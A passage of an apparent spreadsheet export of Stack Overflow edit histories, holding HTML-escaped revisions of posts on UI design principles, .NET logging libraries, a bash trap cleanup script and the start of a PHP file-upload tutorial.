 &lt;span class="diff-add"&gt; &amp;gt; ##Subsequent Expansions: [Dr. Theo Mandel][2] &amp;gt; &amp;gt; ###Place Users in Control &amp;gt; &amp;gt; - Use Modes Judiciously **(modeless)** &amp;gt; - Allow Users to use either the Keyboard or Mouse **(flexible)** &amp;gt; - Allow Users to Change Focus **(interruptible)** &amp;gt; - Display Descriptive Messages and Text **(helpful)** &amp;gt; - Provide Immediate and Reversible Actions, and Feedback **(forgiving)** &amp;gt; - Provide meaningful Paths and Exits **(navigable)** &amp;gt; - Accommodate Users with Different Skill Levels **(accessible)** &amp;gt; - Make the User Interface Transparent **(facilitative)** &amp;gt; - Allow Users to Customize the Interface **(preferences)** &amp;gt; - Allow Users to Directly Manipulate Interface Objects **(interactive)** &amp;gt; &amp;gt; ###Reduce Users' Memory Load &amp;gt; &amp;gt; - Relieve Short-term Memory **(remember)** &amp;gt; - Rely on Recognition, not Recall **(recognition)** &amp;gt; - Provide Visual Cues **(inform)** &amp;gt; - Provide Defaults, Undo, and Redo **(forgiving)** &amp;gt; - Provide Interface Shortcuts **(frequency)** &amp;gt; - Promote an Object-action Syntax **(intuitive)** &amp;gt; - Use Real-world Metaphors **(transfer)** &amp;gt; - User Progressive Disclosure **(context)** &amp;gt; - Promote Visual Clarity **(organize)** &amp;gt; &amp;gt; ###Make the Interface Consistent &amp;gt; &amp;gt; - Sustain the Context of Usersâ€™ Tasks **(continuity)** &amp;gt; - Maintain Consistency within and across Products **(experience)** &amp;gt; - Keep Interaction Results the Same **(expectations)** &amp;gt; - Provide Aesthetic Appeal and Integrity **(attitude)** &amp;gt; - Encourage Exploration **(predictable**)&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ande Turner</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// I'm sorry&lt;span class="diff-delete"&gt;...........................&lt;/span&gt;._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// I'm sorry._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kyle Trauberman</t>
  </si>
  <si>
    <t>Muhammad Akhtar</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We maintain an in-house Lotus Notes database that stores absolutely everything from passwords to server change records. It is big, cumbersome, takes an age to load, and is generally not, uh, nice.&lt;/p&gt; _x000D_
 &lt;p&gt; No, this is not a sane way to do it. :-|&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; By the way, some open Source Notes (and cost free) Password DBs could be found here:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Open Secure Password Repository &lt;/span&gt;&lt;a href="http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument&amp;amp;name=Open%20Secure%20Password%20Repository" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument&amp;amp;name=Open%20Secure%20Password%20Repository&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; assono Password-Safe &lt;/span&gt;&lt;a href="http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument&amp;amp;name=assono%20Password-Safe" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument&amp;amp;name=assono%20Password-Safe&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We maintain an in-house Lotus Notes database that stores absolutely everything from passwords to server change records. It is big, cumbersome, takes an age to load, and is generally not, uh, nice.&lt;/p&gt; _x000D_
 &lt;p&gt; No, this is not a sane way to do it. :-|&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rob Howard</t>
  </si>
  <si>
    <t>BastianW</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://logging.apache.org/log4net/index.html" rel="nofollow noreferrer"&gt;log4net&lt;/a&gt; would be the obvious answer.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;edit&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; (not by the author): In case you don't like log4net, here is a comprehensive list of logging frameworks from &lt;/span&gt;&lt;a href="https://github.com/quozd/awesome-dotnet/blob/master/README.md#logging" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;https://github.com/quozd/awesome-dotnet/blob/master/README.md#logging&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/sgryphon/essential-diagnostics" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Essential Diagnostics&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Extends the inbuilt features of System.Diagnostics namespace to provide flexible logging&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/nlog/NLog/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;NLog&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - NLog - Advanced .NET and Silverlight logging&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/ihtfw/Logazmic" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Logazmic&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Open source NLog viewer for Windows&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://elmah.github.io/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;ELMAH&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Official ELMAH site&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/alexbeletsky/elmah-mvc" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Elmah MVC&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Elmah for MVC&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://logary.github.io/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Logary&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Logary is a high performance, multi-target logging, metric, tracing and health-check library for Mono and .NET. .NET's answer to DropWizard. Supports many targets, built for micro-services.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://logging.apache.org/log4net/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Log4Net&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - The Apache log4net library is a tool to help the programmer output log statements to a variety of output targets&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/serilog/serilog" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Serilog&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - A no-nonsense logging library for the NoSQL era. Combines the best of traditional and structured diagnostic logging in an easy-to-use package.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/NickCraver/StackExchange.Exceptional" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;StackExchange.Exceptional&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Error handler used for the Stack Exchange network&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/MicrosoftArchive/semantic-logging" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Semantic Logging Application Block (SLAB)&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Extends the inbuilt features of System.Diagnostics.Tracing namespace (EventSource class) to log to several sinks including Azure Tables, Databases, files (JSON, XML, text). Supports in-process and out-of-process logging through ETW, and Rx for real-time filtering/aggregating of events.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/FoundatioFx/Foundatio#logging" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Foundatio&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - A fluent logging API that can be used to log messages throughout your application.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://github.com/exceptionless/Exceptionless.Net" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Exceptionless&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Exceptionless .NET Client&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://onloupe.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Loupe&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Centralized .NET logging and monitoring. &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[Proprietary]&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[Free Tier]&lt;/span&gt;&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://elmah.io" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;elmah.io&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Cloud logging for .NET web applications using ELMAH. Find bugs before you go live. Powerful search, API, integration with Slack, GitHub, Visual Studio and more. &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[&lt;/span&gt;&lt;a href="https://elmah.io/sponsorship/opensource" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Free for OSS&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;]&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[$]&lt;/span&gt;&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://docs.bugsnag.com/platforms/dotnet/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;BugSnag&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; - Logs errors. Includes useful diagnostic info like stack trace, session, release, etc. Has a free tier. &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;[Free for OSS][$]&lt;/span&gt;&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://logging.apache.org/log4net/index.html" rel="nofollow noreferrer"&gt;log4net&lt;/a&gt; would be the obvious answer.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ray</t>
  </si>
  <si>
    <t>James Ko</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use a trap!&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;TEMPFILES=&lt;/span&gt;( )_x000D_
&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-function"&gt;&lt;span class="hljs-title"&gt;cleanup&lt;/span&gt;&lt;/span&gt;() {_x000D_
  rm -f &lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;TEMPFILES[@]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;trap&lt;/span&gt; cleanup 0_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-function"&gt;&lt;span class="hljs-title"&gt;error&lt;/span&gt;&lt;/span&gt;() {_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-delete"&gt;PARENT_LINENO=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$1&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-delete"&gt;MESSAGE=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$2&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-delete"&gt;CODE=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;{3:-1}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; [[ -n &lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$MESSAGE&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt; ]] ; &lt;span class="hljs-keyword"&gt;then&lt;/span&gt;_x000D_
    &lt;span class="hljs-built_in"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Error on or near line &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;PARENT_LINENO&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;: &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;MESSAGE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;; exiting with status &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;CODE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;else&lt;/span&gt;_x000D_
    &lt;span class="hljs-built_in"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Error on or near line &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;PARENT_LINENO&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;; exiting with status &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;CODE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;fi&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;exit&lt;/span&gt; &lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;CODE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;trap&lt;/span&gt; &lt;span class="hljs-string"&gt;'error ${&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;LINENO&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;}'&lt;/span&gt; ERR_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;...then, whenever you create a temporary file:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;TEMP_FOO=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-subst"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-subst"&gt;(mktemp -t foobar.XXXXXX)&lt;/span&gt;"&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;TEMPFILES+=&lt;/span&gt;( &lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$TEMP_FOO&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt; )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;$TEMP_FOO&lt;/span&gt;&lt;/code&gt; will be deleted on exit, and the current line number will be printed. (&lt;code&gt;set -e&lt;/code&gt; is always a good practice, and will likewise give you exit-on-error behavior).&lt;/p&gt; _x000D_
 &lt;p&gt; You can either let the trap call &lt;code&gt;error&lt;/code&gt; for you (in which case it uses the default exit code of 1 and no message) or call it yourself and provide explicit values; for instance:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;error &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-variable"&gt;LINENO&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt; &lt;span class="hljs-string"&gt;"the foobar failed"&lt;/span&gt; 2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; will exit with status 2, and give an explicit message.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use a trap!&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;tempfiles=&lt;/span&gt;( )_x000D_
&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-function"&gt;&lt;span class="hljs-title"&gt;cleanup&lt;/span&gt;&lt;/span&gt;() {_x000D_
  rm -f &lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;tempfiles[@]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;trap&lt;/span&gt; cleanup 0_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-function"&gt;&lt;span class="hljs-title"&gt;error&lt;/span&gt;&lt;/span&gt;() {_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-add"&gt;parent_lineno=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$1&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-add"&gt;message=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$2&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;local&lt;/span&gt; &lt;span class="diff-add"&gt;code=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;{3:-1}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; [[ -n &lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$message&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt; ]] ; &lt;span class="hljs-keyword"&gt;then&lt;/span&gt;_x000D_
    &lt;span class="hljs-built_in"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Error on or near line &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;parent_lineno&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;: &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;message&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;; exiting with status &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;code&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;else&lt;/span&gt;_x000D_
    &lt;span class="hljs-built_in"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Error on or near line &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;parent_lineno&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;; exiting with status &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;code&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;fi&lt;/span&gt;_x000D_
  &lt;span class="hljs-built_in"&gt;exit&lt;/span&gt; &lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;code&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt;"&lt;/span&gt;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;trap&lt;/span&gt; &lt;span class="hljs-string"&gt;'error ${&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;lineno&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;}'&lt;/span&gt; ERR_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;...then, whenever you create a temporary file:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;temp_foo=&lt;span class="hljs-string"&gt;"&lt;span class="hljs-subst"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;&lt;span class="hljs-subst"&gt;(mktemp -t foobar.XXXXXX)&lt;/span&gt;"&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;tempfiles+=&lt;/span&gt;( &lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"&lt;span class="hljs-variable"&gt;$temp_foo&lt;/span&gt;"&lt;/span&gt;&lt;/span&gt; )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and &lt;code&gt;&lt;span class="diff-add"&gt;$temp_foo&lt;/span&gt;&lt;/code&gt; will be deleted on exit, and the current line number will be printed. (&lt;code&gt;set -e&lt;/code&gt; is always a good practice, and will likewise give you exit-on-error behavior).&lt;/p&gt; _x000D_
 &lt;p&gt; You can either let the trap call &lt;code&gt;error&lt;/code&gt; for you (in which case it uses the default exit code of 1 and no message) or call it yourself and provide explicit values; for instance:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;error &lt;span class="hljs-variable"&gt;${&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-variable"&gt;lineno&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-variable"&gt;}&lt;/span&gt; &lt;span class="hljs-string"&gt;"the foobar failed"&lt;/span&gt; 2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; will exit with status 2, and give an explicit message.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Charles Duffy</t>
  </si>
  <si>
    <t>Draemon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;HTML&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&amp;lt;form enctype=&lt;span class="hljs-string"&gt;"multipart/form-data"&lt;/span&gt; action=&lt;span class="hljs-string"&gt;"action.php"&lt;/span&gt; method=&lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;&amp;gt;_x000D_
&amp;lt;input type=&lt;span class="hljs-string"&gt;"hidden"&lt;/span&gt; name=&lt;span class="hljs-string"&gt;"MAX_FILE_SIZE"&lt;/span&gt; value=&lt;span class="hljs-string"&gt;"1000000"&lt;/span&gt; /&amp;gt;_x000D_
&amp;lt;input name=&lt;span class="hljs-string"&gt;"userfile"&lt;/span&gt; type=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; /&amp;gt; &amp;lt;input type=&lt;span class="hljs-string"&gt;"submit"&lt;/span&gt; value=&lt;span class="hljs-string"&gt;"Go"&lt;/span&gt; /&amp;gt;_x000D_
&amp;lt;/form&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;action.php&lt;/code&gt; is the name of a PHP file that will process the upload (shown below)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;MAX_FILE_SIZE&lt;/code&gt; must appear immediately before the input with type &lt;code&gt;file&lt;/code&gt;. This value can easily be manipulated on the client so should not be relied upon. It's main benefit is to provide the user with early warning that their file is too large, before they've uploaded it.&lt;/li&gt; _x000D_
  &lt;li&gt; You can change the name of the input with type &lt;code&gt;file&lt;/code&gt;, but make sure it doesn't contain any spaces. You must also update the corresponding value in the PHP file (below).&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;PHP&lt;/strong&gt;&lt;/p&gt; _x000D_
